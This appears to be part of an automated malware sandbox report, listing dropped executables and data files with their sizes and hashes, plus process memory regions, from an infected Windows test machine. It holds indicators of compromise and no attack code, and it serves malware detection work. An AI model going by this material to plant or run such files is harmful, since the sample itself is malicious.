                                                                                      8f6cd60a4bcc013ffc48a3ee82aac23a349583ad2af144ecbff6567155b8ef25f6a39391d1bc3c28bcd9503d81881ac9be8500c6486dc5e841ee54dce386a5a3

                                                                                      Download Submit

                                                                                    • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\TokenBroker\Cache\fbaf94e759052658216786bfbabcdced1b67a5c2.tbres
                                                                                      Filesize

                                                                                      2KB

                                                                                      MD5

                                                                                      012167e68953af83d0ea4ff5d880407b

                                                                                      SHA1

                                                                                      21d0cd0efa1999f1a4e6c21164c82c0e63c1c222

                                                                                      SHA256

                                                                                      82719c941f03070e4814ccde6ecc086b04348de2c3bd13f7f894d7b8f6175fb8

                                                                                      SHA512

                                                                                      b05247b762dc0316ae32fdc3313fea2cd6bbdf1f8edc971cf38e1df6bd1c84b325eb15347ede39dc9449fb98ea0c2e34c359a84d20d3a24cd3a4b59a0c495cb6

                                                                                      Download Submit

                                                                                    • C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\80AM9X7C\microsoft.windows[1].xml
                                                                                      Filesize

                                                                                      96B

                                                                                      MD5

                                                                                      c839a1973d3feaead377ea2dad131fe6

                                                                                      SHA1

                                                                                      252758616792b9b2f10bc460c84b1c1eba75ea04

                                                                                      SHA256

                                                                                      efecd8d483398a6cb569af17e66cb0ba1ca4b9c65f4a697fc7642cc007fc3ccd

                                                                                      SHA512

                                                                                      fee6ca3d2ae272b0f1f291e98830215f2ac138747651be78325ab7c1ba3f01f72cbfed4c886853caba45f16c59c78543a87a5f872b2c1f85bffa3a4e11bf50e1

                                                                                      Download Submit

                                                                                    • C:\Users\Admin\AppData\Roaming\D0769\9E3C.076
                                                                                      Filesize

                                                                                      996B

                                                                                      MD5

                                                                                      f441a17da8efa194910ec308d167485f

                                                                                      SHA1

                                                                                      779a7bec12c38b0076d3f317b9fca397f631d05b

                                                                                      SHA256

                                                                                      c76296420e21572f3a6f0a355691281377e7c6803a8d56482c361868cf56f4a6

                                                                                      SHA512

                                                                                      ecd591e7e9f22991ec26151d4d0fc1c0913c1657d11c6873e882531e70c565957d3c3d3a0958949719464af8d7bbf51910e3d1f7face47a6999a00659cc714d0

                                                                                      Download Submit

                                                                                    • C:\Users\Admin\AppData\Roaming\D0769\9E3C.076
                                                                                      Filesize

                                                                                      1KB

                                                                                      MD5

                                                                                      be587b97650c34510843f3e4a22c4848

                                                                                      SHA1

                                                                                      60600227a0a1e4e6a0b482fe73f46db6ec14e846

                                                                                      SHA256

                                                                                      d065008ed40b69f1a449c5b3c5ed5149f39a70fef9053bcd663deeff38c79259

                                                                                      SHA512

                                                                                      7d590f102e241d1bc80ce44af5217521b4e334579722f310a0a42228c138ff4aae379e5e6015584409a1a23b223d2cebdc92fe1132e7d372a89598a732a517b5

                                                                                      Download Submit

                                                                                    • C:\Users\Admin\AppData\Roaming\D0769\9E3C.076
                                                                                      Filesize

                                                                                      600B

                                                                                      MD5

                                                                                      8a215f82a1aa0deaa061f6e76fdeec64

                                                                                      SHA1

                                                                                      7468308724f4ababafcc1bb59abacad689d0b471

                                                                                      SHA256

                                                                                      e8977c2d1fbe3fa2aa38d655a327ff64159467d4a96e95547c35a507eca143ac

                                                                                      SHA512

                                                                                      039da53844821231b82c3238a3eb159e03d8f4a0fd0f156222dad99450cc7941a92017764128ce153bcf7c3aee0b8d92cbc1a336f3e3fdd9bb3b3985c467e6e2

                                                                                      Download Submit

                                                                                    • C:\Users\Admin\DV245F.exe
                                                                                      Filesize

                                                                                      216KB

                                                                                      MD5

                                                                                      00b1af88e176b5fdb1b82a38cfdce35b

                                                                                      SHA1

                                                                                      c0f77262df92698911e0ac2f7774e93fc6b06280

                                                                                      SHA256

                                                                                      50f026d57fea9c00d49629484442ea59cccc0053d7db73168d68544a3bbf6f59

                                                                                      SHA512

                                                                                      9e55e7c440af901f9c6d0cdae619f6e964b9b75c9351c76ea64362ff161c150b12a1caabb3d2eb63353a59ae70e7159ca6b3793ed0cc11994766846ac316107f

                                                                                      Download Submit

                                                                                    • C:\Users\Admin\aohost.exe
                                                                                      Filesize

                                                                                      152KB

                                                                                      MD5

                                                                                      4401958b004eb197d4f0c0aaccee9a18

                                                                                      SHA1

                                                                                      50e600f7c5c918145c5a270b472b114faa72a971

                                                                                      SHA256

                                                                                      4c477ed134bc76fa7b912f1aad5e59d4f56f993baa16646e25fec2fdeed3bd8b

                                                                                      SHA512

                                                                                      f0548bdaafce2cde2f9d3bd1c26ed3c8e9321ef6d706bd372e18886d834828e5bb54ae44f19764e94574ceb4a1a2a99bdd8476e174b05114fcac9a6d4a2d58e6

                                                                                      Download Submit

                                                                                    • C:\Users\Admin\bohost.exe
                                                                                      Filesize

                                                                                      173KB

                                                                                      MD5

                                                                                      0578a41258df62b7b4320ceaafedde53

                                                                                      SHA1

                                                                                      50e7c0b00f8f1e5355423893f10ae8ee844d70f4

                                                                                      SHA256

                                                                                      18941e3030ef70437a5330e4689ec262f887f6f6f1da1cd66c0cbae2a76e75bf

                                                                                      SHA512

                                                                                      5870a73798bad1f92b4d79f20bf618112ec8917574f6b25ab968c47afff419a829eef57b0282fb4c53e6e636436c8cf52a01426c46bdd4a0ea948d371f0feb09

                                                                                      Download Submit

                                                                                    • C:\Users\Admin\dohost.exe
                                                                                      Filesize

                                                                                      24KB

                                                                                      MD5

                                                                                      d7390e209a42ea46d9cbfc5177b8324e

                                                                                      SHA1

                                                                                      eff57330de49be19d2514dd08e614afc97b061d2

                                                                                      SHA256

                                                                                      d2d49c37bdf2313756897245c3050494b39e824af448450eca1c0e83cf95b1e5

                                                                                      SHA512

                                                                                      de0eb11dd20cd9d74f47b138fb4189a299a57173fe2635150045b01629354f35b26e0575acd25501403af0db238a123b2e5a79582b47aee1d6e786f5eec1929d

                                                                                      Download Submit

                                                                                    • C:\Users\Admin\qwjuiw.exe
                                                                                      Filesize

                                                                                      216KB

                                                                                      MD5

                                                                                      d67214c0364472dc7bbce91a22c21af3

                                                                                      SHA1

                                                                                      fc00bcaf3785bbecfe4a3af87f67207fd7424605

                                                                                      SHA256

                                                                                      39449ea18804dd2a19d0fa34713d634ae44e31a5b7a86cac8946ffb19aac07d9

                                                                                      SHA512

                                                                                      532fa4a95dfecaf79f48d07ce7bf80f50d7d8ab0da706aed7bf6383a16d210fe27bb7485b5f456baf29c3caa3b6719d8f5140cd277931772385428a27bbac322

                                                                                      Download Submit

                                                                                    • memory/412-291-0x000001A74EB40000-0x000001A74EB60000-memory.dmp

                                                                                      Filesize

                                                                                      128KB

                                                                                      Download

                                                                                    • memory/412-278-0x000001A74EB80000-0x000001A74EBA0000-memory.dmp

                                                                                      Filesize

                                                                                      128KB

                                                                                      Download

                                                                                    • memory/412-307-0x000001A74EF50000-0x000001A74EF70000-memory.dmp

                                                                                      Filesize

                                                                                      128KB

                                                                                      Download

                                                                                    • memory/1052-745-0x0000023CD5B40000-0x0000023CD5B60000-memory.dmp

                                                                                      Filesize

                                                                                      128KB

                                                                                      Download

                                                                                    • memory/1052-734-0x0000023CD4C20000-0x0000023CD4D20000-memory.dmp

                                                                                      Filesize

                                                                                      1024KB

                                                                                      Download

                                                                                    • memory/1052-732-0x0000023CD4C20000-0x0000023CD4D20000-memory.dmp

                                                                                      Filesize

                                                                                      1024KB

                                                                                      Download

                                                                                    • memory/1052-755-0x0000023CD6150000-0x0000023CD6170000-memory.dmp

                                                                                      Filesize

                                                                                      128KB

                                                                                      Download

                                                                                    • memory/1052-737-0x0000023CD5B80000-0x0000023CD5BA0000-memory.dmp

                                                                                      Filesize

                                                                                      128KB

                                                                                      Download

                                                                                    • memory/1520-5-0x0000000000400000-0x000000000041F000-memory.dmp

                                                                                      Filesize

                                                                                      124KB

                                                                                      Download

                                                                                    • memory/2016-1033-0x0000000004D70000-0x0000000004D71000-memory.dmp

                                                                                      Filesize

                                                                                      4KB

                                                                                      Download

                                                                                    • memory/2072-882-0x0000000003EF0000-0x0000000003EF1000-memory.dmp

                                                                                      Filesize

                                                                                      4KB

                                                                                      Download

                                                                                    • memory/2072-271-0x0000000003180000-0x0000000003181000-memory.dmp

                                                                                      Filesize

                                                                                      4KB

                                                                                      Download

                                                                                    • memory/2272-151-0x0000000000400000-0x0000000000452000-memory.dmp

                                                                                      Filesize

                                                                                      328KB

                                                                                      Download

                                                                                    • memory/2272-260-0x0000000000400000-0x0000000000452000-memory.dmp

                                                                                      Filesize

                                                                                      328KB

                                                                                      Download

                                                                                    • memory/2272-75-0x0000000000400000-0x0000000000452000-memory.dmp

                                                                                      Filesize

                                                                                      328KB

                                                                                      Download

                                                                                    • memory/2368-894-0x00000172C1320000-0x00000172C1340000-memory.dmp

                                                                                      Filesize

                                                                                      128KB

                                                                                      Download

                                                                                    • memory/2368-907-0x00000172C1720000-0x00000172C1740000-memory.dmp

                                                                                      Filesize

                                                                                      128KB

                                                                                      Download

                                                                                    • memory/2368-890-0x00000172C1360000-0x00000172C1380000-memory.dmp

                                                                                      Filesize

                                                                                      128KB

                                                                                      Download

                                                                                    • memory/2948-585-0x0000029DED690000-0x0000029DED6B0000-memory.dmp

                                                                                      Filesize

                                                                                      128KB

                                                                                      Download

                                                                                    • memory/2948-580-0x0000029DEC740000-0x0000029DEC840000-memory.dmp

                                                                                      Filesize

                                                                                      1024KB

                                                                                      Download

                                                                                    • memory/2948-596-0x0000029DED650000-0x0000029DED670000-memory.dmp

                                                                                      Filesize

                                                                                      128KB

                                                                                      Download

                                                                                    • memory/2948-608-0x0000029DEDC60000-0x0000029DEDC80000-memory.dmp

                                                                                      Filesize

                                                                                      128KB

                                                                                      Download

                                                                                    • memory/2948-581-0x0000029DEC740000-0x0000029DEC840000-memory.dmp

                                                                                      Filesize

                                                                                      1024KB

                                                                                      Download

                                                                                    • memory/3136-46-0x0000000000400000-0x000000000041E000-memory.dmp

                                                                                      Filesize

                                                                                      120KB

                                                                                      Download

                                                                                    • memory/3168-41-0x0000000000400000-0x0000000000427000-memory.dmp

                                                                                      Filesize

                                                                                      156KB

                                                                                      Download

                                                                                    • memory/3168-47-0x0000000000400000-0x0000000000427000-memory.dmp

                                                                                      Filesize

                                                                                      156KB

                                                                                      Download

                                                                                    • memory/3168-42-0x0000000000400000-0x0000000000427000-memory.dmp

                                                                                      Filesize

                                                                                      156KB

                                                                                      Download

                                                                                    • memory/3168-74-0x0000000000400000-0x0000000000427000-memory.dmp

                                                                                      Filesize

                                                                                      156KB

                                                                                      Download

                                                                                    • memory/3168-48-0x0000000000400000-0x0000000000427000-memory.dmp

                                                                                      Filesize

                                                                                      156KB

                                                                                      Download

                                                                                    • memory/3320-1-0x0000000000400000-0x00000000004CF000-memory.dmp

                                                                                      Filesize

                                                                                      828KB

                                                                                      Download

                                                                                    • memory/3320-269-0x0000000000400000-0x00000000004CF000-memory.dmp

                                                                                      Filesize

                                                                                      828KB

                                                                                      Download

                                                                                    • memory/3320-0-0x0000000000400000-0x00000000004CF000-memory.dmp

                                                                                      Filesize

                                                                                      828KB

                                                                                      Download

                                                                                    • memory/3320-4-0x0000000000400000-0x00000000004CF000-memory.dmp

                                                                                      Filesize

                                                                                      828KB

                                                                                      Download

                                                                                    • memory/3320-7-0x0000000000400000-0x00000000004CF000-memory.dmp

                                                                                      Filesize

                                                                                      828KB

                                                                                      Download

                                                                                    • memory/3320-6-0x0000000000400000-0x00000000004CF000-memory.dmp

                                                                                      Filesize

                                                                                      828KB

                                                                                      Download

                                                                                    • memory/3320-49-0x0000000000400000-0x00000000004CF000-memory.dmp

                                                                                      Filesize

                                                                                      828KB

                                                                                      Download

                                                                                    • memory/4028-428-0x0000000004490000-0x0000000004491000-memory.dmp

                                                                                      Filesize

                                                                                      4KB

                                                                                      Download

                                                                                    • memory/4108-457-0x0000023DAF2A0000-0x0000023DAF2C0000-memory.dmp

                                                                                      Filesize

                                                                                      128KB

                                                                                      Download

                                                                                    • memory/4108-430-0x0000023DADE00000-0x0000023DADF00000-memory.dmp

                                                                                      Filesize

                                                                                      1024KB

                                                                                      Download

                                                                                    • memory/4108-431-0x0000023DADE00000-0x0000023DADF00000-memory.dmp

                                                                                      Filesize

                                                                                      1024KB

                                                                                      Download

                                                                                    • memory/4108-445-0x0000023DAEC90000-0x0000023DAECB0000-memory.dmp

                                                                                      Filesize

                                                                                      128KB

                                                                                      Download

                                                                                    • memory/4108-435-0x0000023DAECD0000-0x0000023DAECF0000-memory.dmp

                                                                                      Filesize

                                                                                      128KB

                                                                                      Download

                                                                                    • memory/4648-731-0x0000000004630000-0x0000000004631000-memory.dmp

                                                                                      Filesize

                                                                                      4KB

                                                                                      Download

                                                                                    • memory/4760-149-0x0000000000400000-0x0000000000452000-memory.dmp

                                                                                      Filesize

                                                                                      328KB

                                                                                      Download

                                                                                    • memory/4832-578-0x0000000004250000-0x0000000004251000-memory.dmp

                                                                                      Filesize

                                                                                      4KB

                                                                                      Download

                                                                                    • memory/4864-73-0x0000000000400000-0x0000000000452000-memory.dmp

                                                                                      Filesize

                                                                                      328KB

                                                                                      Download

                                                                                    We care about your privacy.

                                                                                    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.